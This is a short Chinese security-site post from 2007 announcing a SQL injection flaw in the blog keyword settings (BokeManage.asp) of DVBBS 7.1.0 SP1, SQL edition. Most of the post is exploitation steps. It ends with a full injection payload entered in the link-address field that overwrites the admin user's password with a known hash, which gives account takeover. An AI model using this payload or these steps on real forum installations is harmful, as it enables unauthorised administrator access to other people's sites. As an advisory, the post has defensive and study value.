栏目导航: 首页 > 漏洞预警 > 程序漏洞 > 内容

DVBBS 7.1.0 SP1博客远程注入漏洞

www.hx99.net    时间: 2007-10-25    阅读: 次     整理: 华西安全网
漏洞文件:BokeManage.asp
受影响版本:DVBBS <= 7.1.0 sp1 SQL版
利用方法 (转自守护天使's Blog):
注册会员→ 进入管理博客→关健字设置
随便填


再编辑关健字


上面几个还是随便填写。。
在第三个,也就是连接地址这里写入语句
123123'where 1=0;update dv_user set userpassword='469e80d32c0559f8' where username='admin'--
本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭